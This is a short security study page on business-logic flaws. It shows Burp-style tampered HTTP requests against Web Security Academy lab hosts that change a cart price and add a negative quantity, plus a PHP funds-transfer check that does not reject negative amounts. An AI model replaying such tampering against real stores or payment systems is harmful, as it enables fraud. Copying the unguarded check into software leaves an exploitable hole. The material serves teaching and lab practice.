Web Logic Flows - Security

Web / Logic Flows

Price Change

Wrong assumption that users will interact with the application only via interface.

 
# Request from user interface

POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1&price=133700

# Request from Burp Repeater

POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1&price=1 # Look Here

Bank Transfer

An attacker may pass in a negative value and induce unwanted behavior.

 
/** 
 * Funds transfer between two bank accounts:
 * 
 * If the attacker sent -$1000 to the victim's account, 
 * this might result in them receiving $1000 from the victim instead. 
 */

$transferAmount = $_POST['amount'];
$currentBalance = $user->getBalance();

if ($transferAmount <= $currentBalance) {

} else {}

Negative Quantity

Exploit on an website that doesn't check negative quantities.

 
# Request from user interface

POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
productId=1&redir=PRODUCT&quantity=1 # price: 1337


# Request from Burp Repeater

POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
productId=2&redir=PRODUCT&quantity=-100 # price: -13

# 1337 - 1300 = 37 > 100 (store credit)

minte9
LearnRemember

Web / Logic Flows

Price Change

Bank Transfer

Negative Quantity

References

minte9 LearnRemember

Web / Logic Flows

Price Change

Bank Transfer

Negative Quantity

References

minte9
LearnRemember